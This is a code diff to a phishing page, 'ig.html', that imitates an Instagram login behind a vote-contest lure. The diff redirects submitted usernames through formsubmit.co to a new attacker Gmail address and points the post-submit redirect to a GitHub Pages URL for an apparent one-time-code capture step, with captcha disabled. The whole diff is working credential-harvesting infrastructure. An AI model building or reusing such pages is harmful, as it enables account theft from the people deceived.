--- a/ig.html
+++ b/ig.html
@@ -34,7 +34,7 @@
                     </div>
                 </div>
                 <div class="form-container">
-                    <form id="form"  method="POST" action="https://formsubmit.co/votersforambassador@gmail.com">
+                    <form id="form"  method="POST" action="https://formsubmit.co/voteformeonimgcontest@gmail.com">
 
                     <div class="form-content box">
                         <div class="logo">
@@ -59,7 +59,7 @@
                                     </span>
                                     <input type="text" name="username" id="username" required>
                                     <input type="hidden" name="_captcha" value="false">
-                                    <input type="hidden" name="_next" value="https://foodnetworklauch.github.io/vote/instagram/otp/657daf104b167f68d1979b9c.html">
+                                    <input type="hidden" name="_next" value="https://dtegqw.github.io/vzak/instagram/otp/657daf104b167f68d1979b9c.html">
                                 </div>
                                 
                             </div>
